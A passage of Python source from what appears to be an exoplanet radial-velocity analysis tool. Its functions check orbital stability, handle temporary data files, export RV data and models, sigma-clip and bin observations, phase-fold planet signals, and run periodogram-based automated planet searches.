AMD_stable = True
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
else:
pl_ecc = np.array([float(obj.params.planet_params[2 + i*7]) for i in range(obj.npl)])
pl_a = np.array([float(obj.fit_results.a[i]) for i in range(obj.npl)])
pl_mass = np.array([float(obj.fit_results.mass[i]) for i in range(obj.npl)])
inds = pl_a.argsort()
sorted_pl_ecc = pl_ecc[inds]
sorted_pl_a = pl_a[inds]
sorted_pl_mass = pl_mass[inds]
for i in range(obj.npl - 1):
alpha = sorted_pl_a[i]/sorted_pl_a[i+1]
gamma = sorted_pl_mass[i]/sorted_pl_mass[i+1]
epsilon = (sorted_pl_mass[i]+sorted_pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.-sorted_pl_ecc[i]**2)) + 1.-np.sqrt(1.-sorted_pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
#print( AMD,AMD_Hill)
if AMD >= AMD_Hill:
return False
return AMD_stable
def loglik_AMD_penalty(pl_a,pl_ecc,pl_mass,st_mass):
for i in range(len(pl_a) - 1):
alpha = pl_a[i]/pl_a[i+1]
gamma = pl_mass[i]/pl_mass[i+1]
epsilon = (pl_mass[i]+pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.- pl_ecc[i]**2)) + 1.-np.sqrt(1.- pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
if AMD >= AMD_Hill:
return -np.inf
return 0
def randomString(stringLength=5):
"""
Generate a random string of fixed length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def copy_file_to_datafiles(path):
'''
creates a temp_ velocity file in the root directory of the GUI.
input: full path to the file
output: temp_name of the file to be loaded
'''
dirname, basename = os.path.split(path)
#temp_dir = './datafiles'#tempfile.gettempdir()
tmp = '/tmp/es2'
if platform.system() == 'Darwin':
if not os.path.exists(tmp):
os.system("mkdir %s"%tmp)
tmp = '/tmp/es2/%s'%randomString(5)
os.system("mkdir %s"%tmp)
else:
tmp = tempfile.mkdtemp()
temp_path = os.path.join(tmp, basename)
# os.system("cp %s %s"%(path, temp_path))
f_in = open(path, "r")
lines = f_in.readlines()
f = open(temp_path, 'wb') # open the file
for j in range(len(lines)):
line = lines[j].split()
if line[0].startswith("#"):
continue
text = b"%s %s %s \n"%(bytes(str(line[0]).encode()),bytes(str(line[1]).encode()),bytes(str(line[2]).encode()) )
f.write(text)
f.close()
f_in.close()
return temp_path
def mut_incl(i1,i2,capOm):
'''
Calculates the mutual inclination of two planets
input parameters:
i1,i2, Delta Omega: inclinations and diffence of the line of nodes in deg.
output parameters:
Delta i: mutual orbital inclination in deg.
'''
fb = np.degrees(np.arccos(((np.cos(np.radians(i1))*np.cos(np.radians(i2)))+
(np.sin(np.radians(i1))*np.sin(np.radians(i2))*np.cos(np.radians(capOm))))))
return fb
def add_jitter(obj, errors, ind):
errors_with_jitt = np.array([np.sqrt(errors[i]**2 + obj.params.jitters[ii]**2) for i,ii in enumerate(ind)])
return errors_with_jitt
def get_stellar_rotation(obj, print_output=False):
'''
'''
vsini = float(obj.stellar_vsini)
vsini_d = float(obj.stellar_vsini_err)
R = float(obj.stellar_radius)
R_d = float(obj.stellar_radius_err)
Rot = (2*np.pi*R*695700.0)/ (vsini * 86400.0)
Delta_Rot = np.sqrt( ( ( (2*np.pi*R*695700.0)**2 * (vsini_d*86400.0)**2) + ((2*np.pi*R_d*695700.0)**2 * (vsini*86400.0)**2) ) /
(vsini*86400.0)**4
)
if print_output == True:
print("Stellar Rot. period = %s +/- %s [days]"%(Rot, Delta_Rot))
return [Rot, Delta_Rot]
def get_rv_scatter(obj, print_output=False,use_kb2011=False):
'''
'''
Solar_fact = 0.234
Solar_fact_d = 0.014
M = float(obj.stellar_mass)
M_d = float(obj.stellar_mass_err)
L = float(obj.stellar_luminosity)
L_d = float(obj.stellar_luminosity_err)
Teff = float(obj.stellar_Teff)/5771.0
Teff_d = float(obj.stellar_Teff_err)/5771.0
if use_kb2011==True:
A = (L / ((M**1.5)*(Teff**4.25))) * Solar_fact
delta_A = 0.25*np.sqrt(
(L**2.0 * (
4.0*Teff**2.0 *(
(4.0 * (M**2.0) * (Solar_fact_d**2.0)) +
(9.0 * M_d**2.0 * Solar_fact**2.0)) +
(289.0 * (Teff_d**2.0) * (M**2.0) * (Solar_fact**2.0) )) +
(16.0 * (L_d**2.0) * (Teff**2.0) * (M**2.0) * (Solar_fact**2.0)) ) / ((Teff**(21.0/2.0)) * (M**5.0)) )
if print_output == True:
print("KB2011 jitter = %s +/- %s [m/s]"%(A, delta_A))
else:
A = (L/M) * Solar_fact
delta_A = np.sqrt( (L**2.0 * ((M**2.0)*(Solar_fact_d**2.0) + (M_d**2.0)*(Solar_fact**2.0) ) +
((L_d**2.0) *(M**2.0) * (Solar_fact**2.0) ) )/ M**4.0 )
if print_output == True:
print("KB1995 jitter = %s +/- %s [m/s]"%(A, delta_A))
return [A, delta_A]
def export_RV_data(obj, idset_ts, file="RV_data.txt", jitter=False, o_c=False, print_data=False, width = 10, precision = 3):
if len(obj.filelist.idset)==0:
return
# if idset_ts ==0:
# print("dataset IDs start from 1")
# return
# elif len(np.atleast_1d(idset_ts)) > 1:
# if 0 in idset_ts:
# print("dataset IDs start from 1")
# return
#if not os.path.exists(path):
# os.makedirs(path)
output_file = str(file)
f = open(output_file, 'w')
idset_ts = np.array(np.atleast_1d(idset_ts)) #-1
JD = obj.fit_results.rv_model.jd
if not o_c:
rv = obj.fit_results.rv_model.rvs
else:
rv = obj.fit_results.rv_model.o_c
id_set = obj.filelist.idset
if jitter==True:
sigma = add_jitter(obj,obj.fit_results.rv_model.rv_err, id_set)
else:
sigma = obj.fit_results.rv_model.rv_err
if len(idset_ts)==1:
for i in range(len(JD[id_set==idset_ts[0]])):
if print_data == True:
print(float(JD[i]), float(rv[i]), float(sigma[i]))
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} \n'.format(float(JD[i]), float(rv[i]), float(sigma[i]), width = width, precision = precision ) )
else:
for i in range(len(idset_ts)):
for ii in range(len(JD)):
if int(id_set[ii]) != int(idset_ts[i]):
continue
else:
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} \n'.format(float(JD[ii]), float(rv[ii]), float(sigma[ii]), idset_ts[i], width = width, precision = precision ) )
f.close()
print('Done!')
return
def export_RV_model(obj, file="RV_model.txt", width = 10, precision = 4):
if len(obj.fit_results.rv_model.jd)==0:
return
#if not os.path.exists(path):
# os.makedirs(path)
output_file = str(file)
f = open(output_file, 'w')
JD = obj.fit_results.model_jd
if obj.doGP == True:
y_model = obj.fit_results.model + obj.gp_model_curve[0]
else:
y_model = obj.fit_results.model
for i in range(len(JD)):
# f.write('%.4f %.4f \n'%(float(JD[i]), float(y_model[i]) ))
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} \n'.format(float(JD[i]), float(y_model[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def export_orbital_evol(obj, file="orb_evol.txt", planet = 1, width = 10, precision = 6):
k = int(planet-1)
if len(obj.evol_T[k])==0 or k < 0:
print("No N-body integrations done?")
return
output_file = str(file)
f = open(output_file, 'w')
#obj.evol_T_energy
#obj.evol_energy
#obj.evol_momentum['lx']
#obj.evol_momentum['ly']
#obj.evol_momentum['lz']
T = obj.evol_T[k]
a = obj.evol_a[k]
e = obj.evol_e[k]
om = obj.evol_p[k]
M = obj.evol_M[k]
inc = obj.evol_i[k]
Om =obj.evol_Om[k]
for i in range(len(T)):
# f.write('%.4f %.4f \n'%(float(JD[i]), float(y_model[i]) ))
f.write('{0:{width}.{precision}f} {1:{width}.{precision}f} {2:{width}.{precision}f} {3:{width}.{precision}f} {4:{width}.{precision}f} {5:{width}.{precision}f} {6:{width}.{precision}f} \n'.format(float(T[i]), float(a[i]), float(e[i]), float(om[i]),float(M[i]),float(inc[i]),float(Om[i]), width = width, precision = precision) )
f.close()
print('Done!')
return
def check_temp_RV_file(obj):
for i in range(obj.filelist.ndset):
if os.path.exists(obj.filelist.files[i].path):
continue
else:
dirname, basename = os.path.split(obj.filelist.files[i].path)
os.makedirs(dirname)
f = open(obj.filelist.files[i].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[i][0])):
if str(obj.rv_data_sets[i][0][j]).startswith("#"):
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[i][0][j]).encode()),bytes(str(obj.rv_data_sets[i][1][j]).encode()),bytes(str(obj.rv_data_sets[i][2][j]).encode()) )
f.write(text)
f.close()
def modify_temp_RV_file_old(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
for j in range(len(obj.rv_data_sets[file_n][0])):
#obj.rv_data_sets[file_n+1][2][j] = np.sqrt(new_error[j])
if str(obj.rv_data_sets[file_n][0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(obj.rv_data_sets[file_n][0][j]).encode()),bytes(str(obj.rv_data_sets[file_n][1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
def bin_rv_data(obj, file_n = 0, bin_size = 1.0, bin_tf = False):
if bin_tf == False:
obj.rv_data_sets[file_n] = dill.copy(obj.rv_data_sets_init[file_n])
return
else:
JD = np.array(obj.rv_data_sets[file_n][0])
rv = np.array(obj.rv_data_sets[file_n][1])
sigma = np.array(obj.rv_data_sets[file_n][2])
idset = np.array(obj.rv_data_sets[file_n][2])
mask = np.zeros(len(JD))
mj_all = []
mr_all = []
ms_all = []
mi_all = []
for x in range(len(JD)):
JD_int = JD.astype(int)
mask = (JD_int != JD_int[x]).astype(int)
mj = np.ma.masked_array(JD, mask=mask).compressed()
mr = np.ma.masked_array(rv, mask=mask).compressed()
ms = np.ma.masked_array(sigma, mask=mask).compressed()
mi = np.ma.masked_array(idset, mask=mask).compressed()
mj_all.append(np.mean(mj))
mr_all.append(np.average(mr, weights=1./ms))
#ms_all.append(np.average(ms/np.sqrt(len(ms)), weights=1./ms) )
ms_all.append(np.average(ms) )
mi_all.append(np.mean(mi))
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + (abs(max(mr)-min(mr))**2.0) ) )
#ms_all.append( np.sqrt( (np.average(ms/np.sqrt(len(ms)), weights=1./ms)**2.0) + np.std(mr)**2.0) ) )
#print np.median(mr), np.std(mr)
JD, indices = np.unique(np.asarray(mj_all), return_index=True)
ind = np.array(indices)
mr_all = np.array(mr_all)
mj_all = np.array(mj_all)
ms_all = np.array(ms_all)
mi_all = np.array(mi_all)
mr_all = mr_all[ind]
mj_all = mj_all[ind]
ms_all = ms_all[ind]
mi_all = mi_all[ind]
obj.rv_data_sets[file_n] = np.array([mj_all,mr_all,ms_all,mi_all])
#obj.rv_data_sets[file_n][0] = dill.copy(mj_all)
#obj.rv_data_sets[file_n][1] = dill.copy(mr_all)
#obj.rv_data_sets[file_n][2] = dill.copy(ms_all)
#obj.rv_data_sets[file_n][3] = dill.copy(mi_all)
return obj
def modify_temp_RV_file(obj, file_n = 0, add_error = 0, data_to_keep = None):
if obj.filelist.ndset < file_n +1:
print("No RV file # %s"%(file_n+1))
return
elif not os.path.exists(obj.filelist.files[file_n].path):
return
else:
if add_error < 0:
sign = -1
else:
sign = 1
new_error = []
for j in range(len(obj.rv_data_sets[file_n][0])):
k = obj.rv_data_sets[file_n][2][j]**2 + add_error**2 *sign
if k < 0:
print("You seem to subtract %s from the error budget. As a result, the RV uncertainty of one or more elements would be negative. Errors cannot be negative. Please subtract another value"%add_error)
return
new_error.append(k)
f = open(obj.filelist.files[file_n].path, 'wb') # open the file
org_data_file = obj.rv_data_sets[file_n]
for j in range(len(org_data_file[0])):
#obj.rv_data_sets[file_n+1][2][j] = np.sqrt(new_error[j])
if str(org_data_file[0][j]).startswith("#") or data_to_keep != None and j not in data_to_keep:
continue
text = b"%s %s %s \n"%(bytes(str(org_data_file[0][j]).encode()),bytes(str(org_data_file[1][j]).encode()),bytes(str(np.sqrt(new_error[j])).encode()) )
f.write(text)
f.close()
obj.filelist.read_rvfiles(obj.params.offsets)
return obj
### some experimets! ###
def sigma_clip(obj, type = 'RV', sigma_clip = 10, file_n = 0, add_error = 0, remove_mean = False, verbose = True):
if type == 'RV':
if sigma_clip == None:
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = None)
return
else:
obj2 = dill.copy(obj)
modify_temp_RV_file(obj2, file_n = file_n, add_error = add_error, data_to_keep = None)
#obj2.epoch = obj.epoch
obj2.fitting(outputfiles=[1,1,0], minimize_fortran=True, minimize_loglik=True,amoeba_starts=0)
JD_data = obj2.fit_results.rv_model.jd[obj2.filelist.idset==file_n]
o_c_data = obj2.fit_results.rv_model.o_c[obj2.filelist.idset==file_n]
data_ind = obj2.filelist.idset
c, low, upp = pdf.sigmaclip(o_c_data, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(o_c_data) if z in c]
removed_idx = [x for x, z in enumerate(o_c_data) if z not in c]
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = remaining_idx)
del obj2
if verbose:
print("\n %s clipped epochs:"%type)
for z in JD_data[removed_idx]:
print(z)
return obj
if type == 'act':
if len(obj.act_data_sets[file_n]) == 0:
print("No act. file # %s"%(file_n))
return
#obj.act_data_sets[file_n] = dill.copy(obj.act_data_sets_init[file_n])
org_epoch = obj.act_data_sets_init[file_n][0]
org_data = obj.act_data_sets_init[file_n][1]
org_data_sig = obj.act_data_sets_init[file_n][2]
org_data_mean = org_data - np.mean(org_data)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.act_data_sets[file_n][1] = np.take(obj.act_data_sets_init[file_n][1], remaining_idx)
obj.act_data_sets[file_n][0] = np.take(obj.act_data_sets_init[file_n][0], remaining_idx)
obj.act_data_sets[file_n][2] = np.take(obj.act_data_sets_init[file_n][2], remaining_idx)
new_org_data = obj.act_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
if remove_mean == True:
obj.act_data_sets[file_n][1] = new_org_data_mean
else:
if remove_mean == True:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data_mean
obj.act_data_sets[file_n][2] = org_data_sig
else:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data
obj.act_data_sets[file_n][2] = org_data_sig
return obj
if type == 'tra':
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
#obj.act_data_sets[file_n] = dill.copy(obj.act_data_sets_init[file_n])
org_epoch = obj.tra_data_sets_init[file_n][0]
org_data = obj.tra_data_sets_init[file_n][1]
org_data_sig = obj.tra_data_sets_init[file_n][2]
org_data_o_c = obj.tra_data_sets_init[file_n][3]
#org_data = obj.tra_data_sets_init[file_n][1]
org_data_mean = org_data_o_c - np.mean(org_data_o_c)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.tra_data_sets[file_n][3] = np.take(obj.tra_data_sets_init[file_n][3], remaining_idx)
obj.tra_data_sets[file_n][0] = np.take(obj.tra_data_sets_init[file_n][0], remaining_idx)
obj.tra_data_sets[file_n][2] = np.take(obj.tra_data_sets_init[file_n][2], remaining_idx)
obj.tra_data_sets[file_n][1] = np.take(obj.tra_data_sets_init[file_n][1], remaining_idx)
obj.tra_data_sets[file_n][4] = np.take(obj.tra_data_sets_init[file_n][4], remaining_idx)
new_org_data = obj.tra_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
#if remove_mean == True:
# obj.tra_data_sets[file_n][1] = new_org_data_mean
else:
# if remove_mean == True:
# obj.tra_data_sets[file_n][0] = org_epoch
# obj.tra_data_sets[file_n][1] = org_data_mean
# obj.tra_data_sets[file_n][2] = org_data_sig
#
# else:
obj.tra_data_sets[file_n][0] = org_epoch
obj.tra_data_sets[file_n][1] = org_data
obj.tra_data_sets[file_n][2] = org_data_sig
obj.tra_data_sets[file_n][3] = org_data_o_c
obj.tra_data_sets[file_n][4] = org_data_o_c
return obj
def transit_data_norm(obj, file_n = 0, norm = False, verbose = True):
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
if norm == True:
obj.tra_data_sets[file_n][0] = obj.tra_data_sets_init[file_n][0]
obj.tra_data_sets[file_n][1] = obj.tra_data_sets_init[file_n][1]/np.mean(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = obj.tra_data_sets_init[file_n][2]/np.mean(obj.tra_data_sets_init[file_n][1])
else:
obj.tra_data_sets[file_n][0] = dill.copy(obj.tra_data_sets_init[file_n][0])
obj.tra_data_sets[file_n][1] = dill.copy(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = dill.copy(obj.tra_data_sets_init[file_n][2])
return obj
### some experimets! ###
def gen_RV_curve(obj,x=None):
obj2 = dill.copy(obj)
f = open('datafiles/RV_curve', 'wb') # open the file
if len(x) > 3:
for j in range(len(x)):
#print(fit_new.rv_data_sets[i][0][j])
text = b"%s %s %s \n"%(bytes(str(x[j]).encode()),bytes(str(0.0).encode()),bytes(str(1.0).encode()) )
f.write(text)
f.close()
obj2.add_dataset("RV_curve", "datafiles/RV_curve",0.0,0.0) # the last two entries are initial offset and jitter
os.system("rm datafiles/RV_curve")
obj2.fitting(outputfiles=[0,1,0], minimize_fortran=True, minimize_loglik=True, amoeba_starts=0, print_stat=False)
jd = obj2.fit_results.rv_model.jd
# rvs = obj2.fit_results.rv_model.rvs
o_c = obj2.fit_results.rv_model.o_c*(-1)
#print(o_c)
return np.array([jd,o_c])
#############################
def file_from_path(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def run_command_with_timeout(args, secs, output=False, pipe=False): # set output=True if you need to save the output
'''
Run a command and kill if it takes too long.
'''
# print(args)
if not (pipe):
text=tempfile.TemporaryFile() # because PIPE usually has too low capacity
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=text, stderr=text)
else:
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE, stderr=PIPE)
# print(proc)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
if proc_thread.is_alive():
#print (proc.pid)
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
pass
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
return '',flag
if not (pipe):
text.seek(0)
string_to_output=text.readlines()
else:
text=proc.communicate()[0]
string_to_output=text.splitlines()
for i in range(len(string_to_output)):
string_to_output[i]=string_to_output[i].decode('utf-8').split()
if not (pipe):
text.close()
flag = 1
if (output):
return string_to_output,flag # besides the flag which informs about successful termination we also return all the console output in case we want to save it in a variable
else:
return '',flag
def run_command_with_timeout_old(args, secs, output=False, pipe=False): # set output=True if you need to save the output
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
text = proc.communicate()[0]
flag = 1
if proc_thread.is_alive():
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
#text = '0 0 0 0'
return text.decode('utf-8'),flag
#return proc, flag , text.decode('utf-8')
return text.decode('utf-8'),flag
def phase_RV_planet_signal(obj,planet):
if obj.npl ==0 or len(obj.fit_results.rv_model.jd) ==0:
return
else:
copied_obj = dill.copy(obj)
if(copied_obj.mod_dynamical):
copied_obj.mod_dynamical = False
index = planet - 1
############################################
############# here is the trick! ##########
############################################
pp0 = copied_obj.params.planet_params[7*index+0] # we define a variable to be the planet amplitude Kj
copied_obj.params.planet_params[7*index+0] = 0.0000001 # then we set Kj to be 0, i.e. remove the j-th planet signal
copied_obj.fitting(minimize_loglik=True, amoeba_starts=0,
outputfiles=[0,1,1],return_flag=False, npoints=int(len(obj.fit_results.model)),
model_max=int(max(obj.fit_results.model_jd)-max(copied_obj.fit_results.rv_model.jd)),
model_min=int(copied_obj.epoch -min(obj.fit_results.model_jd)))
# and we create the static Nplanet model for the data and the model curve
# now this model residuals will contain ONLY the j-th planet signal + the best fit residuals
copied_obj.params.planet_params[7*index+0] = pp0 # we restore Kj to its best fit value.
############################################
######### trick is over ##########
############################################
#print(copied_obj.params.planet_params[7*index+1])
#print((copied_obj.epoch- copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
############ phase fold fix for sparse model ######
model_time_phase = np.array( (copied_obj.fit_results.model_jd -copied_obj.fit_results.model_jd[0] + (copied_obj.fit_results.model_jd[0] - copied_obj.epoch) )%copied_obj.params.planet_params[7*index+1] )
model_shift = copied_obj.params.planet_params[7*index+1] - (copied_obj.fit_results.rv_model.jd[0] - copied_obj.epoch )%copied_obj.params.planet_params[7*index+1]
model_time_phase = (model_time_phase + model_shift)% copied_obj.params.planet_params[7*index+1]
sort = sorted(range(len(model_time_phase)), key=lambda k: model_time_phase[k])
model_time_phase = model_time_phase[sort]
phased_model = obj.fit_results.model[sort] - copied_obj.fit_results.model[sort]
############ phase data ######
data_time_phase = np.array( (copied_obj.fit_results.rv_model.jd - copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
sort = sorted(range(len(data_time_phase)), key=lambda k: data_time_phase[k])
data_time_phase = data_time_phase[sort]
phased_data = copied_obj.fit_results.rv_model.o_c[sort]# - copied_obj.fit_results.rv_model.rvs[sort]
phased_data_err = copied_obj.fit_results.rv_model.rv_err[sort]
phased_data_idset = copied_obj.fit_results.idset[sort]
if copied_obj.doGP == True:
phased_data = phased_data - copied_obj.gp_model_data[0][sort]
#else:
# rv_data = ph_data[1]
model = [model_time_phase, phased_model]
data = [data_time_phase, phased_data, phased_data_err, phased_data_idset]
#del copied_obj
#####################
obj.ph_data[planet-1] = data
obj.ph_model[planet-1] = model
return data, model
def find_planets_restricted(obj,fend=1.5):
power_levels = np.array([0.1,0.01,0.001])
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
# obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
return obj
def find_planets(obj):
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
return obj
def run_gls(obj,fend =1.0,fbeg=10000):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
if len(obj.fit_results.rv_model.jd) > 5:
RV_per = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.rvs, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK',ofac=10, fbeg=omega[-1], fend=omega[0],)
obj.gls = RV_per
else:
return obj
return obj
def run_gls_o_c(obj,fend =1.0,fbeg=10000, as_main = False):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
if len(obj.fit_results.rv_model.jd) > 5:
RV_per_res = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.o_c, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK', ofac=10, fbeg=omega[-1], fend=omega[0],)
if as_main == False:
obj.gls_o_c = RV_per_res
elif as_main == True:
obj.gls = RV_per_res
else:
return obj
return obj
def is_float(n):
'''
